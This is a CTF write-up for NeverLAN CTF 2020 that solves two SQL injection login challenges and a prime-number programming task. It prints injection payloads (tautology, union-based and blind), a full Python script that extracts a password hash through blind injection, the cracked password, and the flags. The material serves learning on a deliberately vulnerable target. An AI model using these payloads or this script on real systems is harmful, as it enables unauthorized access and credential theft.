[NeverLAN CTF 2020] Web - SQL Breaker 1 / SQL Breaker 2 / DasPrime

SQL Breaker 1

I am posting write-up after ctf server has been shuted down.

So, I will explain the write-up not in detail but focus core ideas.

We can find the login form like above.

The challenge name is 'SQL Breaker 1', so we can easily guess this challenge is a kind of sql injection problem.

 

When we insert the WORLD WIDE PAYLOAD 'or 1=1#, we easily can get the flag.

 

 

Flag is flag{Sql1nj3ct10n}

 

 

SQL Breaker 2

Second challange have very similar web UI.

Almost equal login form. But when we insert the payload 'or 1=1--  at username field, it is logged in as john 

We should logged in as admin user.

When I tried insert the payload 'or 1=1-- in password field, it doesn't work. Just incorrect username/password error message was seen to me.

 

So I guessed the sql query on server side is like below

SELECT * FROM USER WHERE name='{$name}' and pw=hash('{$password}')

 

I thought it is better to insert payload on username field rather than password field.

 

Several more trials, I guessed that there is no admin account row in server database.

So I tried Union based sql injection.

 

I insert the paylods on username below.

dddd'union select 'admin'-- 

dddd'union select 'admin', 'admin'-- 

dddd'union select 'admin','admin', 'admin'--

 

Those derives login fail. I guessed the number of column returned is not 1 or 2 like that.

 

When I insert 5 column with union sqli paylod, it successed.

dddd'union select '1','2','3','4','5'-- 

 

But it still log-ined as john.

 

With more consideration, to get more information about the server database data, I tried blind sql injection to get some more data.

 

I extracted password field and id field with payload like

john' and length(password) > 5-- 

john' and ord(substr(name,2,1)) > 5-- 

that.

 

#!/usr/bin/env python

import urllib
import urllib2
import sys

URL = "https://challenges.neverlanctf.com:1165/login.php"
UA =  "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
Cookie = "PHPSESSID=bhon2smt11sccq4nehiglstqaj"

def logout():
    uurl = URL + "?logout"
    req = urllib2.Request(uurl, {}, {
        'User-Agent': UA,
        'Cookie': Cookie
    })
    res = urllib2.urlopen(req)
    

def query(Q):
    logout()
    UURL = URL + "?password=1&username=" + urllib.quote(Q)
    req = urllib2.Request(UURL, {}, {
        'User-Agent': UA,
        'Cookie': Cookie
    })

    res = urllib2.urlopen(req)
    text = res.read()
    if "location.href" in text:
        print "Session expired..."
        sys.exit()
    # print text
    return "<h2>Welcome" in text

def find_length():
    left = 0
    right = 200 # (left, right]
    while left < right:
        mid = (left+right)//2
        print "Finding... {} {} {}".format(left, mid, right)
        if query("john' and length(name) > {}-- ".format(mid)):
            left = mid+1
        else:
            right = mid
    return right

def find_ch(pos):
    print "Finding pos {} th character".format(pos)
    left = 0
    right = (1<<8)
    while left < right:
        mid = (left+right)//2
        print "Finding... {} {} {}".format(left, mid, right)
        if query("john' and ord(substr(name,{},1)) > {}-- ".format(pos, mid)):
            left = mid+1
        else:
            right = mid
    print "COOL!! {} = {}".format(pos, right)
    return right

LENGTH = find_length()
print "LENGTH = {}".format(LENGTH)
PASSWORD = ""
for i in range(1, LENGTH+1):
    PASSWORD += chr(find_ch(i))
    print PASSWORD

print PASSWORD

query(PASSWORD)

Interesting result occured.

 

password = "0a4b0ae54adbdc2825e1b05e16c7164cfdfce29e8f6fd104c7e539fc39e5c619"

id = "1"

 

password length was 64, so I thought it is 256bit hash digest.

When I get them in commonplace sha256 online decrypt database, result was "T3stUs3r"

 

When I tried to login with John/T3stUs3r, it succeed.

 

I thought id value in the database is "John" but it was number 1.

 

I tried union based sql injection to get other id number

dddd'union select '2','2','3','4','5'-- 

 

This payload give me the admin account login session.

 

The first return column must be the id value in database, id=1 is user john, id=2 is user admin.

 

 

 

Flag is flag{esc4p3y0ur1nputs}

 

DasPrime

So simple programming challenge.

Simply correct the python code to get correct prime numbers.

import math
def main():
    primes = []
    count = 2
    index = 0
    while True:
        isprime = True
        for x in range(2, int(math.sqrt(count) + 1)):
            if count % x == 0: 
                isprime = False
                continue
        if isprime:
            primes.append(count)
            print(index, primes[index])
            index += 1
            if index == 10497:
                break
        count += 1
if __name__ == "__main__":
    main()

Code above print the (index, prime) from 0th index to 10496th index.

We count from 0, 10496 indexed number prime is actually 10497th prime.

 

The prime number detection algorithm is naive.

If a number //(A//) is not divisible with //(B//) between //(2//) and //(\sqrt A//), the number //(A//) is prime.

 

When you run the python code above, the result is like that

The answer is 110573.